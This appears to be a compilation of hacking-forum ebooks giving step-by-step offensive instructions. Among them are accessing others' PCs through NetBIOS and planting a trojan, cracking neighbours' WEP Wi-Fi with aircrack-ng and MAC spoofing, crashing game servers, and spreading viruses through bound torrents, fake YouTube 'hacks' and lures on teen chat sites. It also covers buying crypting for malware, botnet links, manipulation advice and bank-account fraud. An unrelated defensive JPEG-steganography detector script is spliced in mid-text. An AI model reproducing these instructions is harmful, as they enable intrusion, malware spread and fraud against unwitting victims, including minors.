The only problem with this is that they can run the NETSTAT command while you are connected and get the IP of your machine. That's why it only works on simple PC machines: people these days are computer illiterate and have no idea what these commands can do. They have no idea what NETSTAT is, so you can use that to your advantage. Most PC systems are kind of hard to hack using this method now, because they are more secure and can tell when another system is trying to gain access. Also, be sure that you (somehow) know whether they are running a firewall or not, because it will block the connection to their computer. Most home systems aren't running a firewall, and to make it better, their owners don't know how to operate a firewall, which leaves the hole in the system. To help you out, it would be a great idea to pick up some programming languages, to see how the computer reads information, and to learn some things about TCP/IP (Transfer Control Protocol/Internet Protocol). If you want to find out whether they are running a firewall, simply hop on a proxy and do a port scan on their IP. You will notice if they are running a firewall because most ports are closed. Either way, you still have a better chance of hacking a home system than hacking Microsoft.

Gaining Access

7. Once you have added this to your LMHOST file, you are basically done. All you need to do is go to Start, Find, Computer. Once you get there, simply type the IP address or the host name of the system. When it comes up, simply double click it, and boom! There's a GUI for you, so you don't have to use DOS anymore. You can use DOS to do it, but it's more simple and fun this way, so that's the only way I put it. When you open the system you can edit, delete, rename, do anything to any file you wish. I would also delete the command file in C:/ because they may use it if they think someone is in their computer. Or simply delete the shortcut to it.

Then here's where the programming comes in handy. Instead of using the NBTSTAT method all the time, you can program your own trojan on your OWN port number and upload it to the system. Then you will have easier access and a better GUI, with more features. DO NOT allow more than one connection to the system unless they are on a faster connection. If you are downloading something from their computer without their knowledge and their connection is being slow, they may check their NETSTAT to see what is connected, which will show your IP and make them suspicious. That's it. All there is to it. Now go out and scan a network or something and find a computer with port 21 or something open.

Hacking WEP wifi passwords

1. Getting the right tools

Download Backtrack 3. It can be found here: http://www.remote-exploit.org/backtrack_download.html The Backtrack 4 beta is out, but until it is fully tested (especially if you are a noob) I would get the BT3 setup. The rest of this guide will proceed assuming you downloaded BT3. I downloaded the CD iso and burned it to a CD. Insert your BT3 CD/USB drive and reboot your computer into BT3. I always load into the 3rd boot option from the boot menu (VESA/KDE). You only have a few seconds before it auto-boots into the 1st option, so be ready. The 1st option boots too slowly or not at all, so always boot from the 2nd or 3rd. Experiment to see what works best for you.

2. Preparing the victim network for attack
Once in BT3, click the tiny black box in the lower left corner to load up a "Konsole" window. Now we must prep your wireless card. Type:

airmon-ng

You will see the name of your wireless card (mine is named "ath0"). From here on out, replace "ath0" with the name of your card. Now type:

airmon-ng stop ath0

then type:

ifconfig wifi0 down

then:

macchanger --mac 00:11:22:33:44:55 wifi0

then:

airmon-ng start wifi0

What these steps did was spoof (fake) your MAC address so that, JUST IN CASE your computer is discovered by someone as you are breaking in, they will not see your REAL MAC address. Moving on...

Now it's time to discover some networks to break into. Type:

airodump-ng ath0

Now you will see a list of wireless networks start to populate. Some will have a better signal than others, and it is a good idea to pick one that has a decent signal, otherwise it will take forever to crack or you may not be able to crack it at all. Once you see the network that you want to crack, do this: hold down Ctrl and tap C. This will stop airodump from populating networks and will freeze the screen so that you can see the info that you need.

**Now from here on out, when I tell you to type a command, you need to replace whatever is in parentheses with what I tell you to from your screen. For example: if I say to type: -c (channel) then don't actually type in -c (channel). Instead, replace that with whatever the channel number is... so, for example, you would type: -c 6 Can't be much clearer than that... let's continue...

Now find the network that you want to crack and MAKE SURE that it says the encryption for that network is WEP. If it says WPA or any variation of WPA then move on... you can still crack WPA with Backtrack and some other tools, but it is a
whole other ball game and you need to master WEP first.

Once you've decided on a network, take note of its channel number and BSSID. The BSSID will look something like this --> 05:gk:30:fo:s9:2n The channel number will be under a heading that says "CH". Now, in the same Konsole window, type:

airodump-ng -c (channel) -w (file name) --bssid (bssid) ath0

The FILE NAME can be whatever you want. This is simply the place where airodump is going to store the packets of info that you receive, to crack later. You don't even put in an extension... just pick a random word that you will remember. I usually make mine "wepkey" because I can always remember it. **Side note: if you crack more than one network in the same session, you must use different file names for each one or it won't work. I usually just name them wepkey1, wepkey2, etc.
Once you've typed in that last command, the airodump screen will change and start to show your computer gathering packets. You will also see a heading marked "IV" with a number underneath it. This stands for "Initialization Vector", but in noob terms all this means is "packets of info that contain clues to the password." Once you gain a minimum of 5,000 of these IVs, you can try to crack the password. I've cracked some right at 5,000 and others have taken over 60,000. It just depends on how long and difficult they made the password. Now you are thinking, "I'm screwed because my IVs are going up really slowly." Well, don't worry, now we are going to trick the router into giving us HUNDREDS of IVs per second.

3. Actually cracking the WEP password

Now leave this Konsole window up and running and open up a 2nd Konsole window. In this one type:
aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 ath0

This will generate a bunch of text, and then you will see a line where your computer is gathering a bunch of packets and waiting on ARP and ACK. Don't worry about what these mean... just know that these are your meal tickets. Now you just sit and wait. Once your computer finally gathers an ARP request, it will send it back to the router and begin to generate hundreds of ARPs and ACKs per second. Sometimes this starts to happen within seconds... sometimes you have to wait up to a few minutes. Just be patient. When it finally does happen, switch back to your first Konsole window and you should see the number underneath IV starting to rise rapidly. This is great! It means you are almost finished! When this number reaches AT LEAST 5,000, you can start your password crack. It will probably take more than this, but I always start my password cracking at 5,000 just in case they have a really weak password. Now you need to open up a 3rd and final Konsole window. This will be where we
actually crack the password. Type:

aircrack-ng -b (bssid) (filename)-01.cap

Remember the filename you made up earlier? Mine was "wepkey". Don't put a space between it and -01.cap here. Type it as you see it. So for me, I would type wepkey-01.cap. Once you have done this you will see aircrack fire up and begin to crack the password. Typically you have to wait for more like 10,000 to 20,000 IVs before it will crack. If this is the case, aircrack will test what you've got so far and then say something like "not enough IVs. Retry at 10,000." DON'T DO ANYTHING! It will stay running... it is just letting you know that it is paused until more IVs are gathered. Once you pass the 10,000 mark it will automatically fire up again and try to crack it. If this fails it will say "not enough IVs. Retry at 15,000." and so on until it
finally gets it.

If you do everything correctly up to this point, before too long you will have the password! Now, if the password looks goofy, don't worry, it will still work. Some passwords are saved in ASCII format, in which case aircrack will show you exactly what characters they typed in for their password. Sometimes, though, the password is saved in HEX format, in which case the computer will show you the HEX encryption of the password. It doesn't matter either way, because you can type in either one and it will connect you to the network. Take note, though, that the password will always be displayed in aircrack with a colon after every 2 characters. So for instance, if the password was "secret", it would be displayed as: se:cr:et This would obviously be the ASCII format. If it was a HEX encrypted password that
was something like "0FKW9427VF" then it would still display as: 0F:KW:94:27:VF Just omit the colons from the password, boot back into whatever operating system you use, try to connect to the network, type in the password without the colons and presto! You are in!

It may seem like a lot to deal with if you have never done it, but after a few successful attempts, you will get very quick with it. If I am near a WEP encrypted router with a good signal, I can often crack the password in just a couple of minutes.

I am not responsible for what you do with this information. Any malicious/illegal activity that you do falls completely on you because... technically... this is just for you to test the security of your own network. :-) I will gladly answer any legitimate questions anyone has to the best of my ability. HOWEVER, I WILL NOT ANSWER ANYONE THAT IS TOO LAZY TO READ THE WHOLE TUT AND JUST ASKS ME SOME QUESTION THAT I CLEARLY ANSWERED. No one wants to hold your hand through this... read the tut and go experiment until you get it right.

There are rare occasions where someone will use WEP encryption with SKA (Shared Key Authentication) as well. If this is the case, additional steps are needed to associate with the router, and therefore the steps I lined out here will not work. I've only seen this once or twice, though, so you probably won't run into it. If I get motivated, I may throw up a tut on how to crack this in the future.

How to hide files in a jpg

Set up:
1. Must have a .zip or .rar compressor.
2. Willingness to learn.

Steps:
1. Save the picture of choice to your desktop.
2. Make a new .rar or .zip archive on your desktop.
3. Add the files you want to hide into the .zip or .rar.
4. Click Start menu, Run, cmd.
5. In Command Prompt type cd "desktop" with the quotation marks.
6. Now type in copy /b picturename.jpg + foldername.rar outputfilename.jpg (If you use .zip then: copy /b picturename.jpg + foldername.zip outputfilename.jpg)
7. Now there should be the output file with a .jpg extension on the desktop. (Do not close Command Prompt just yet.)
8. Double click it to open the picture and check it out.
9. When you're done looking and want to view the hidden files, type: ren outputfilename.jpg outputfilename.rar (or .zip)

Now you're done! A quick info-fact: with this technique of hiding files in a jpg you can send this to anyone and they just have to rename the file extension to .zip or .rar. With this technique the Al-Qaeda operatives were able to send info to others secretively.

How To Kick Everyone From A Counter Strike Source Server

INSTRUCTIONS:
1. Place Buffer1.cfg and Buffer2.cfg in your cfg folder. If it doesn't exist, make it (see below). (Commonly C:\User\program files\steam\steamapps\Account name\counter-strike source\cstrike\cfg)
2. Go in game, open the developer's console, and type in the following (you may change
bind key): Bind M "wait;exec Buffer1;exec Buffer2" (If the developer's console doesn't open, go to Options, Keyboard, Advanced, Enable developer's console.)
3. Go in game and rapidly hit the M key to crash the server. Depending on how fast you hit it, it should take anywhere from 15-30 seconds to crash. Don't stop hitting the key until you get the message: "Client # has overflowed reliable channel." Link to Buffers: http://www.megaupload.com/?d=2RTOUUBU Or check: G:\X-file\Stuff\Buffer Overflow.rar

How to kick someone off a wireless network

Step 1: Open cmd.
Step 2: Write shutdown -i
Step 3: Choose a victim from the list.
Step 4: Choose to shut down their computer.
Step 5: Make the warning pop up 1 sec before shutting down.
Step 6: Click OK.
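The "hide files in a jpg" trick above works because image viewers stop at the JPEG's end-of-image marker while archive tools locate a ZIP or RAR from the archive's own records, so the appended archive rides along unnoticed. The following Python script is an added example, not part of the original ebook: it walks a JPEG's marker segments to find where the picture really ends and reports any ZIP or RAR data appended after it; the sample JPEG and archive bytes are constructed inline.

```python
import io
import struct
import zipfile

# Archive signatures the copy /b trick leaves right after the image data.
ARCHIVE_SIGNATURES = {
    b"PK\x03\x04": "zip",
    b"Rar!\x1a\x07\x00": "rar",       # RAR 1.5 - 4.x
    b"Rar!\x1a\x07\x01\x00": "rar5",
}

JPEG_SOI = b"\xff\xd8"   # start of image
JPEG_EOI = b"\xff\xd9"   # end of image


def _skip_scan_data(data: bytes, pos: int) -> int:
    # Advance past entropy-coded scan data: inside it a 0xFF is either stuffed
    # (followed by 0x00) or a restart marker (0xD0-0xD7); anything else is a
    # real marker and ends the scan.
    n = len(data)
    while pos < n:
        if data[pos] == 0xFF and pos + 1 < n:
            nxt = data[pos + 1]
            if nxt == 0x00 or 0xD0 <= nxt <= 0xD7:
                pos += 2
                continue
            return pos
        pos += 1
    raise ValueError("scan data runs past end of file")


def find_jpeg_end(data: bytes) -> int:
    """Return the offset just past the EOI marker by walking marker segments."""
    if data[:2] != JPEG_SOI:
        raise ValueError("not a JPEG: missing SOI marker")
    pos = 2
    while pos + 2 <= len(data):
        if data[pos] != 0xFF:
            raise ValueError(f"expected a marker at offset {pos}")
        marker = data[pos + 1]
        if marker == 0xFF:            # padding byte before a marker
            pos += 1
            continue
        if marker == 0xD9:            # EOI: the picture proper ends here
            return pos + 2
        if marker in (0x01, 0xD8) or 0xD0 <= marker <= 0xD7:
            pos += 2                  # standalone markers carry no length
            continue
        if pos + 4 > len(data):
            raise ValueError("truncated segment header")
        (length,) = struct.unpack(">H", data[pos + 2:pos + 4])
        pos += 2 + length             # length counts its own two bytes
        if marker == 0xDA:            # SOS: scan data follows the header
            pos = _skip_scan_data(data, pos)
    raise ValueError("no EOI marker found")


def detect_appended_archive(data: bytes):
    """Return None for a clean JPEG, else a dict describing the trailing data."""
    end = find_jpeg_end(data)
    trailer = data[end:]
    if not trailer:
        return None
    kind = next((name for sig, name in ARCHIVE_SIGNATURES.items()
                 if trailer.startswith(sig)), "unknown")
    report = {"kind": kind, "offset": end, "trailer_bytes": len(trailer)}
    if kind == "zip":
        # zipfile locates the central directory from the end of the data, which
        # is also why merely renaming the polyglot to .zip is enough to open it.
        with zipfile.ZipFile(io.BytesIO(trailer)) as zf:
            report["members"] = zf.namelist()
    return report


# Constructed sample inputs (not real files from the page).
def _tiny_jpeg() -> bytes:
    """Minimal stand-in for a JPEG: SOI, APP0, SOS header, scan data, EOI."""
    app0 = b"\xff\xe0" + struct.pack(">H", 2 + 5) + b"JFIF\x00"
    sos = b"\xff\xda" + struct.pack(">H", 2 + 1) + b"\x01"
    scan = b"\x12\x34\xff\x00\x56\xff\xd0\x78"   # stuffed FF 00 and RST0 inside
    return JPEG_SOI + app0 + sos + scan + JPEG_EOI


def _tiny_zip(files: dict) -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, content in files.items():
            zf.writestr(name, content)
    return buf.getvalue()


SAMPLE_CLEAN = _tiny_jpeg()
SAMPLE_POLYGLOT = SAMPLE_CLEAN + _tiny_zip({"secret.txt": b"hidden payload"})

if __name__ == "__main__":
    for label, blob in (("clean", SAMPLE_CLEAN), ("polyglot", SAMPLE_POLYGLOT)):
        print(label, detect_appended_archive(blob))
```

Trailing bytes that match no archive signature are reported as "unknown" so they get inspected rather than ignored.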
Done! :)

Ultimate Guide on Anti-Scamming

Table of Contents.
Chapter 1 - Introduction.
Chapter 2 - Different Types of Scammers.
Chapter 3 - Main Scamming Methods.
Chapter 4 - Unknown Scamming Methods.
Chapter 5 - Buying Installs.
Chapter 6 - Buying Crypting.
Chapter 7 - How Not to be a Victim.
Chapter 8 - What To Do If You Get Scammed.

Chapter 1 - Introduction.
Thank you for buying my eBook! In this eBook you will learn many things, such as the different kinds of scammers, known/highly used methods of scamming, unknown methods of scamming and, lastly, how not to be a victim.

Chapter 2 - Different Types of Scammers.

The main thought in someone's head is, "Low post count / new to forum, must be a scammer!". That is a horrible misconception which could lead to you getting scammed. Only about 4 out of every 20 new people may scam. Now, you may be wondering what other kinds of scammers there could be. There are actually 2 more types.

The Three Types.
Users with little to no rep, and basically no posts.
Users with a low amount of rep, but over 100-200 posts.
Users with a lot of rep, and over 400-500 posts.

Users with low rep but a decent amount of posts can still be scammers. Some people assume that the more posts and rep you have, the safer you are. Another bad misconception. Even though people with high rep and a lot of posts are rarely scammers, there have been a good number of trusted sellers/buyers who turned out to be scammers.

Chapter 3 - Main Scamming Methods.

There are actually quite a few highly known scamming methods; I will list them below.

Method 1. The first is what I call T&B. T&B stands for Take and Block. What scammers will usually do is, as soon as they get access to the product they want, block you on MSN. (What a "T&B" may look like.)

Victim: Hmm, alright since I'm new to this forum I'll go first.
Scammer: Alright thanks man. Just send me information when you're ready!
Victim: Alrighty, the login information to the account is, user name = abc123 and password = 123abc.
Scammer: Alright thank you, let me try it out.
Victim: No problem.
Scammer: Alright it works thank you!
Scammer: Paypal information?
Victim: Alright 1 second.
"Victim" has been blocked from MSN.

And just like that, the victim is out of an account. To fight against this method, never go first. If you are suspicious about someone in any way at all, use a trusted middle man. If the buyer/seller is legit, they will not mind.

Method 2. The second method is where someone steals a trusted user's account. This is a method that is hard to detect, but it can be detected with a few easy steps. If you suspect that a highly trusted member's account has been hacked, wait a few days or so before purchasing or selling. Do all the research you can on this member to see if you can find out anything different. Look at the user's posts, look for MSN information, how they use grammar, how they treat others, etc.

EXAMPLE
You find a leet/uber who wants to buy your product, but you're noticing that they may be trying to rush through MSN. This is an example of how you could figure out if they got hacked.

Grammar Before the Day in Question.
"Thank you for the helpful information! I am glad to stumble a fantastic member like you, you're very helpful. I hope to run some in to some members like you!"

Grammar on the Day in Question.
"Thanks man. Yeah, youre pretty cool I wanna buy from you sometime."

Notice the grammar differences? It's pretty obvious that either someone hacked his account, or someone he knows is using his account. To fight against this, wait a few days and see if he claims that he was hacked or anything.

Chapter 4 - Unknown Scamming Methods.

The following methods are rarely used, and when used are usually very effective. These methods usually scam people the easiest. The scammer will usually take a good amount of time doing this.

FIRST METHOD
Many sellers will ask for a PM if they are in doubt about the buyer. If the scammer is skilled enough/smart enough they can get around this. Instead of sending a PM they will fake their name in Google Chrome. (Chrome has a built-in editing feature.) What I mean is, with Chrome scammers will usually do this with a simple change of text. As you can
see, I changed my name from Chloroform to Omniscient, in Chrome.

There is a simple way to fight against this. Ask them to post on your thread, go into the VIP section, set their away status with your name in it, etc. This is the only way to find out if they are faking their name or not.

SECOND METHOD.
The second method is also where scammers will edit a value. Sometimes a seller will ask "Can I see proof of the money?". Some scammers will just block then and there. Others will edit the value just like before.

BEFORE / AFTER (screenshots)

Just like that, I have $450. See how easy it is just to fake information? This is another way scammers can scam even the most secure buyers/sellers. There's no 100% way to fight back against the Paypal method.

Chapter 5 - Buying Installs.

When buying installs, always get proof of bots; anyone can edit their DDoSer connection number, so you should ask for proof of bots over TeamViewer. You should always get the person to let you
be on their TeamViewer while they send the bots/crypt your file. Once again, they may use the excuse "Sorry, can't use TeamViewer, I'm on Linux". Don't always believe them. Ask them to send a screenshot as proof they're on Linux; if they are a legit buyer/seller, they should have no problem sending you the picture. Also, search up on the user to find out if they are legit or not.

Chapter 6 - Buying Crypting.

Alright, imagine this. You finally make this awesome virus! You can't wait to spread it around! But then you remember that your virus is easily detected by many anti-viruses. So what do you do? Buy crypting. When buying crypting, get on the person's TeamViewer when they crypt your file, or else they could be binding their server to your server, so they get all the bots you get. Also, they may not even be using a good crypter. They could be using some free crypter that they found online for all you know.

Chapter 7 - How Not to be a Victim.

There are some simple ways to fight back against scamming. If you're selling something over the price of $100 (or close to that), before they buy anything say: "I have the right to hold your money for 24-48 hours before providing you with the purchase". This is because, if someone is using a stolen Paypal, it could take 1-2 days before the owner notices the amount missing. This way, if the Paypal is stolen, you won't get scammed. Lastly, if you have ANY doubt about anything you're selling/buying, don't do it! Most of the time your gut can be right.
Chapter 8 - What To Do If You Do Get Scammed.

Alright, you may be freaking out right now if you do get scammed. But remain calm, there are a few things to do to report the scammer / warn others. Go to Market Place > Market Place Discussions > Scam Reports. From there create a new thread, and fill out the following form.

Link to thread:
Description:
Screen shots/Images of scamming in action and proof of purchase:

This form will allow you to make a legit scam report. Also leave a comment on the thread, warning others of the scammer! Thank you for reading this eBook! There will be future updates! If you purchased this eBook (hopefully you did), you will get the update for free! If you have ANY questions at all, feel free to contact me on HF.

Spreading Guide By THEASSASIN

Introduction: In this e-book, I will show you how to spread your virus.

What you need:
- a FUD server
- a brain
- different accounts (you will know which later)

Structure of the guide:
1: Spreading via torrent
2: Spreading via social engineering
3: Spreading via Youtube

1: Spreading via torrent:
For spreading via torrent a good binder is required. The easiest way of doing this is to download popular torrents. A way of finding out which torrents are popular at the moment is, for example: http://thepiratebay.org/top/all

1: Choose one and download it
2: bind your virus to it
3: upload to different torrent sites

The most popular torrent trackers (public):
- Kick Ass Torrents.com
- Torrent Funk
- Isohunt.com
- thepiratbay.org
- btjunkie.org
- (Demonoid) / It is a private tracker so you need an invite
- There are many more! You can visit http://netforbeginners.about.com/od/peersharing/a/torrent_search.htm

What is important?
- find seeders for your torrent
- write a detailed description
- use pictures

2: Social Engineering

This one is my favorite way of spreading. You have to play with people's dreams and wishes. There are many ways to do this. Most important is to be creative.
I will show you two as an example now.

Gaming: (There is a high chance of getting Steam accounts.) There are a lot of gaming forums on the web. Try to upload your virus as a game mod or patch.
http://www.tesnexus.com/
http://www.fallout3nexus.com/
http://www.dragonagenexus.com/

Chatting: Use websites like http://www.321teenchat.com/ Write to them that you want to chat with them. Find out what they like. Finally send them your link.

3: Youtube.com

1. make about 10 copies of your virus
2. rename them to:
-World of Warcraft GameCard Generator
-Runescape PIN Generator
-Steam Game Adder
-Facebook password finder
-Zynga Poker Chips hack
-Cabal online BOT
-World of Warcraft auto leveler cheat
-Software Cracker
-Rsbots auth generator
-Microsoft Serial Generator
-Counter Strike Source Hack
-Free accounts
-WOW bot
-Steam account cracker
3: You can leech videos from "Youtube.com" or make your own videos with "camstudio", for example.
4: If you chose to make your own video, you have to download fake apps or make your own with "Visual Basic". (All can be found on "Hackforums.net".)
5: Upload your video and write a good description. (Mention how you got the app.)
6: Ask in different forums if they can vouch for your video.

The Way of the Blackhat "2+2=5"

By owning this guide you agree to not resell, distribute or make public in any way the information contained within these pages. Furthermore, you agree, by possessing this guide, to never pose as the writer of this eBook.

| Chapter 1 | Knowledge

First things first, we all must understand that a good hacker never stops learning. This applies to much more than software and hardware knowledge. Although keeping up with technological progress is already a huge task, a good hacker must also take care of his 'second personality'. Right now you
must be wondering "Second personality... WTF?"; "Hackers have schizophrenia?"; "Is the author on crack?". Well, to clarify this point, we must see hackers as having two sides. One side is the 'good boy/girl' side that you show off in society (school, work, etc.). This side can help the other one, the 'bad boy/girl' side (that you only show off with trusted people, hacking networks, etc.), by doing social manipulation [social engineering] - see | Chapter 2 | for more information on social engineering.

With these two sides comes a 'priority of operations'. This means that one side is more important than the other and takes over in certain situations. The more important side is the 'good boy/girl' side. For example, if you're in class with trusted people (people that know about your 'bad' side) you should NOT give any clue about your true personality, whether by talking about your activities, actually hacking the teacher's computer, etc. The funny fact is that the side that makes a hacker who he is is usually kept secret. This is done, mostly, to ensure correct and working social engineering.

Pattern draw:
Fake 'good' side = gathering important/somewhat sensitive information from people
Real 'bad' side = exploit/abuse/take advantage of the information gathered to obtain private/extremely sensitive data (CC, bank accounts, online accounts, etc.)

As we all know (I hope), technology evolves rapidly, even
more so in the last decade. This means that new hardware and software are implemented in mainstream computers (the computer of your average Joe) every few years. One thing most hardware makers make sure of when releasing a new product on the market is the product's guaranteed stability. In order to make a piece of hardware stable (safe from crashes/destruction), good software must back it up. Hardware does not go without software and vice versa. This is an obvious fact, but it's at the core of machine hacking.

Keeping up with software advances is a very hefty task. It is so because most archives of software updates on the Internet aren't well organized and most companies publish limited information on their releases. Another reason is the fact that there are a lot of developers out there. A LOT of them. As far as I know there aren't any statistics on the subject, but I'd say the ratio of software developers to hardware developers is 1000:1 (probably even more; I wouldn't be surprised). Now, the reason software developers are more numerous is a social tendency. All this to say that the trick to keeping up with technological evolution is to follow the hardware evolution. Companies provide full information about their updates to existing hardware, new releases, etc. There is no reason to keep it a secret, because reverse engineering exists and it can provide all the details of a new piece of hardware. You might say "Reverse engineering exists for software as well!". That's very true, but it doesn't get you very far.
By reading about new hardware development, you are also referred to the associated software development. Archives usually link software updates (called firmware updates when they are implemented directly in hardware) to their released products. This makes it easy for you to be up to date with the new 'security' measures. Let's take the popular routers made by Linksys as an example. These come into play when trying to hack your neighbor's wireless network key (WEP/WPA). Their support website (http://homesupport.cisco.com/enus/wireless/linksys) gives you access to any of their routers' firmware updates/release notes/etc.

In conclusion, a hacker must be well aware of his actions and must be up to date with the latest security software found in mainstream computers.

| Chapter 2 | Social manipulation [engineering]

Social engineering is done by everyone, not only hackers. Most of us don't even realize we do it. It's something that is somewhat subconscious if not done abusively. When we want something very badly, our brain works to understand how the people that can potentially get us to our goal function. By understanding these persons better, we are able to manipulate them to achieve our goal. Manipulating people can go from saying a few words to elaborating a whole scheme to gain their trust. It can be a piece of cake, but it can also be a
pain in the arse. The difficulty of manipulating someone varies according to a huge number of factors. Here are some of these factors:
- ...ou know the better);
- ... know, the worse);
- ... trust you, you need to earn their trust before proceeding to manipulating);
- ...e person (the more, the better - obviously);
- ... very kind person).
- The list goes on and on

* This applies to the most common kind of manipulation - information extraction. When you want to extract information on a person's machine, you have to do it very subtly or else the person might realize your plans. It doesn't really apply to other kinds of manipulation - such as getting someone to buy something for you - because they are mostly aware of what you want but are convinced to do what you want. Here is a brief example of social engineering:
Goal of the hacker: Get into the target's computer

- Introduce yourself and make small talk
- Continue making conversation -
- You leave with little information, but enough if you are an experienced hacker - you have his OS and his e-mail address. You can get his IP address either by IM or by receiving a simple e-mail from him and checking the e-mail's source. Once you have his IP address and you know his OS, you can exploit (metasploit, etc.) - see | Chapter 3 | for more information on basic hacking tools - and
gain access to his computer†. Once done, your goal is achieved.

† This involves using software applications such as Nmap (port scanner), virtual machines, metasploit (host software exploiter), etc. Social engineering helps you in your software usage.

This is obviously a basic example of social manipulation, more precisely information extraction. In this case we haven't manipulated much, but sometimes that's all we need. You might wonder "Is it really moral to be a social engineer?". Of course NOT! Actually, it depends on who you are. Since everyone is a social engineer and everyone has manipulated someone at some point, we could consider it perfectly normal and moral. However, some persons abuse it and manipulate people all their life. In this case we could consider it immoral. But some people consider it moral, because they put the blame on the people being manipulated (saying they are too blind).
Power Of Hacking® The fun fact is that experimented social engineers could change the face of the world for the better. Since they have a „gift‟ to convince people to do things for their own benefit, they could convince people to do thing for the world‟s benefit. Yep, they do have a big influence. Just as an example, a social manipulator could convince someone to donate money to charity. But, of course, once you are able to do that, you only think about yourself and about the big money YOU could get. In conclusion, you and me are social engineers. We can develop our engineering abilities in this domain simply by practice and study of our entourage. | Chapter 3 | Basic „must-have‟ hacking tools This section is dedicated to software commonly used by hackers and what their purpose/utility is. A brief description will be given, since I do not want to make this eBook 200 pages long :P. This section doesn‟t follow the philosophical intent of the book, but I feel it necessary to give out the basics. ~ Yay! No more bla bla… We finally get something worth our time! :P ~ Nmap: Download link: http://nmap.org/download.html Nmap is a „security port scanner‟ that finds vulnerabilities in machines. It detects running programs on certain open ports of the targeted computer and gives you detailed information on the program in question. With this tool alone you CANNOT gain access to someones Mail:mtahirzahid@yahoo.com

Page 89


Power Of Hacking® computer. You need to pair it up with an exploiter such as metasploit (that will be our next subject). Interface screenshot:

Metasploit: Download link: http://www.metasploit.com/framework/download/

Metasploit is a command-line based 'framework' (as they like calling it) that shows you and lets you use dozens and dozens of public and somewhat private exploits. There are exploits for Windoze, Linux and Unix OSes. Basically, you take the vulnerabilities you found with Nmap and exploit them with meta. No screenshot, as it is command-line (meaning the interface will be your OS's console).

VirtualBox: Download link: http://www.virtualbox.org/wiki/Downloads

VirtualBox is a free, open source virtual machine creator. Get rid of the overrated VMware :P. At the base this does the same thing as VMware, except it doesn't require you to crack it because it's FREE! This will allow you to run a second OS at the same time as your main OS. It creates a guest OS and you can control it at the same time as you're controlling your main OS. Very useful when you want to be able to erase sensitive data that you acquired while hacking (whereas if you did it on your main OS, you'd probably have to cook your hard disk to destroy all evidence).

Interface screenshot:

- In this version (yes, I will make a V2) I will only 'give out' these three programs as the main hacking programs – there are hundreds, maybe thousands, of different goals when hacking. These programs can't cover all the types of hacking. This time, I decided to cover the basics of the most popular kind of hacking: hacking another machine.

/ HackForums links to useful hacking tools and threads \

*Note: These links may go down in time as threads on the forum get deleted

∞ RATs/Keyloggers/Stealers by Anubis™ http://www.hackforums.net/showthread.php?tid=595859
∞ Index of hacking tutorials by Valiant http://hackforums.net/showthread.php?tid=504268
∞ List of MD5 web crackers by th3.g4m3_0v3r http://www.hackforums.net/showthread.php?tid=591358
∞ Crypters/Binders/Virus Builders by flAmingw0rm http://www.hackforums.net/showthread.php?tid=238890
∞ Security programs by protocol™ http://www.hackforums.net/showthread.php?tid=592772
∞ Ultimate guide to PC Security by Vaqxine http://www.hackforums.net/showthread.php?tid=34240
∞ Hack a Gmail account http://www.hackforums.net/showthread.php?tid=572968
∞ Botnet setup http://www.hackforums.net/showthread.php?tid=101297
∞ Wireless network hacking http://www.hackforums.net/showthread.php?tid=502252

I hope you enjoy! Notify me if ever one of these links goes down/changes and I will gladly update it.

| Chapter 4 | The Brotherhood

0. Intro

This chapter is dedicated to hacking communities and the people that are found in them. Hacking communities are places for hackers to share their knowledge and progress. Most often, the communities allow any hacker to enter – whether it be the extremely advanced hacker or the beginner 'n00b' hacker. If you are a beginner, do not hesitate to ask around, although not too much :P. People are there to help you and, if you ask politely,

you will more than certainly get an adequate answer.

1. Rules

Hacking communities, like real-life social communities, have rules you must obey. They are common-sense rules that make the stay in the community more pleasant [such as NO SPAMMING]. "I thought hackers were free to do whatever they wanted." It's partially true. Even hackers are limited in their actions. If they weren't, the Internet would be chaos. Furthermore, they are free to break the rules, but they will have to suffer the consequences of doing so. There are users (usually users that don't have much hacking experience) that join a hacking community just for the heck of breaking the rules and pissing everyone off. For example, HF has a rule forbidding users to post infected files. This is done to keep the hacking level between members to a minimum. There have been, although very few, cases of persons who joined and posted infected files for users to download, saying it was a good hacking tool. Usually new users (with a low post count, when it's a question of a forum) are suspected of breaking rules/scamming others/etc. It's a very normal way of thinking. This is an auto-protection measure that you have taken all your life and will continue taking. Remember when your mummy told you "Never talk to strangers"? Well, this is exactly a 'stranger' case. Nobody knows much about the new user and therefore he is a stranger. We never trust strangers. Although, everyone has started off as

a new user at some point and progressed out of it. This is to say that new users should at least gain a certain respect from other members. Not necessarily their trust, but at least their respect. A lot of 'older' users treat new users badly because they associate 'stranger' with 'no trust' and 'no trust' with 'not worthy of anything else either'.

2. Community vs. Community

Some communities hate other communities for the reason that they copy most of their content (without crediting, most of the time). This provokes endless flaming wars and leads to an eventual DoS/DDoS of one of the communities' websites. The website that remains up is declared 'winner'. Although, as I have had the opportunity to see this a few times, the remaining community is soon DDoSed as well by the others. In the end, nobody wins and it's just a waste of time and keystrokes. The solution to this is to not care about other communities' work/actions and to take care of OUR users. This way, we are the ones being promoted.

~ More in v2

| Up Next | Plans for v2

- 4 chapters;
- In-depth hacking tutorials;
- programs.

This eBook was more of a tease compared to the upcoming one. Everything I produce will be kept free! I hope you enjoyed!

Disclaimer: I do NOT recommend doing any of the above. Everything stated in this book is for informational and educational purposes ONLY! Use at your own risk.

If you have any questions or suggestions I would be more than glad to hear what you have to say and help you! Just PM me on HF.

Note from the author: The reason I made this eBook free is because I believe in free access to information and promote and support open source, free applications!

~ Believe in free access to information ~
~ Believe in Open Source ~
~ Believe in theoretical ~


Hello. I will show you how to earn money very fast. All you have to do is work one time, and then the money will fly into your account. And if you work more, you earn more. Follow these steps to start.

Note: This tutorial is for the new dudes who want to earn money.

Step 1) Go to this site www.adf.ly and register (this link will open in a new tab).
Step 2) Go to ShareCash.org.
Step 3) Go to http://www.youtube.com and register.
Step 4) Make a .txt and upload it twice to $harecash.
Step 5) Make an Adf.ly link to each one of them.
Step 6) Download Windows Movie Maker. If you have it, you don't need to download it.
Step 7) Make a video with this text only: Go To Description for more information!
Step 8) Upload the video around 1000x times. (lol, you can do 5 videos if you want, but if you want to be really really rich do 1000x+)
Step 9) Giving out my level 138 RuneScape account. Here is the link: and link your adf.ly link. And continue uploading videos and do the same.

And spread your referral links for adf.ly and $harecash, you will earn So Much cash xD

How To Create Unlimited US Bank Accounts Allowing You To Verify PayPal Accounts.

What can I do with this guide? - This guide is used to show an individual how to create multiple US bank accounts. These bank accounts can be used mainly for verifying only US PayPal accounts.

